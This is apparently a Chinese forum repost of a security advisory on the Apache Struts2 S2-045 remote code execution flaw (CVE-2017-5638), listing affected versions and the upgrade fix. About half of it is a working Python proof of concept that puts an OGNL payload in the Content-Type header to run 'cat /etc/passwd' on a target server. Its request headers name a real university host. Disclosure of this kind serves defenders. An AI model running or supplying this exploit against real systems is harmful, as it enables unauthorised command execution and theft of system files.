返回列表 发帖

Apache Struts2 曝任意代码执行漏洞 (S2-045,CVE-2017-5638)

FreeBuf上次曝Struts 2的漏洞已经是半年多以前的事情了。这次的漏洞又是个RCE远程代码执行漏洞。简单来说,基于Jakarta Multipart解析器进行文件上传时,利用漏洞可进行远程代码执行。 该漏洞由安恒信息Nike Zheng上报。

Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架。
漏洞编号
CVE-2017-5638
漏洞简介
Struts使用的Jakarta解析文件上传请求包不当,当远程攻击者构造恶意的Content-Type,可能导致远程命令执行。
实际上在default.properties文件中,struts.multipart.parser的值有两个选择,分别是jakarta和pell(另外原本其实也有第三种选择cos)。其中的jakarta解析器是Struts 2框架的标准组成部分。默认情况下jakarta是启用的,所以该漏洞的严重性需要得到正视。
影响范围
Struts 2.3.5 – Struts 2.3.31
Struts 2.5 – Struts 2.5.10
修复方案
如果你正在使用基于Jakarta的文件上传Multipart解析器,请升级到Apache Struts 2.3.32或2.5.10.1版;或者也可以切换到不同的实现文件上传Multipart解析器。
漏洞PoC
  1. #! /usr/bin/env python
  2. # encoding:utf-8
  3. import urllib2
  4. import sys
  5. from poster.encode import multipart_encode
  6. from poster.streaminghttp import register_openers
  7. header1 ={
  8. "Host":"alumnus.shu.edu.cn",
  9. "Connection":"keep-alive",
  10. "Refer":"alumnus.shu.edu.cn",
  11. "Accept":"*/*",
  12. "X-Requested-With":"XMLHttpRequest",
  13. "Accept-Encoding":"deflate",
  14. "Accept-Language":"zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4",
  15. }
  16. def poc():
  17.     register_openers()
  18.     datagen, header = multipart_encode({"image1": open("tmp.txt", "rb")})
  19.     header["User-Agent"]="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
  20.     header["Content-Type"]='''%{(#nike='multipart/form-data').
  21.     (#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).
  22.     (#_memberAccess?(#_memberAccess=#dm):
  23.     ((#container=#context['com.opensymphony.xwork2.ActionContext.container']).
  24.     (#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).
  25.     (#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).
  26.     (#context.setMemberAccess(#dm)))).(#cmd='cat /etc/passwd').
  27.     (#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).
  28.     (#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).
  29.     (#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).
  30.     (#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().
  31.     getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).
  32.     (#ros.flush())}'''
  33.     request = urllib2.Request(str(sys.argv[1]),datagen,headers=header)
  34.     response = urllib2.urlopen(request)
  35.     print response.read()

  36. poc()
复制代码

返回列表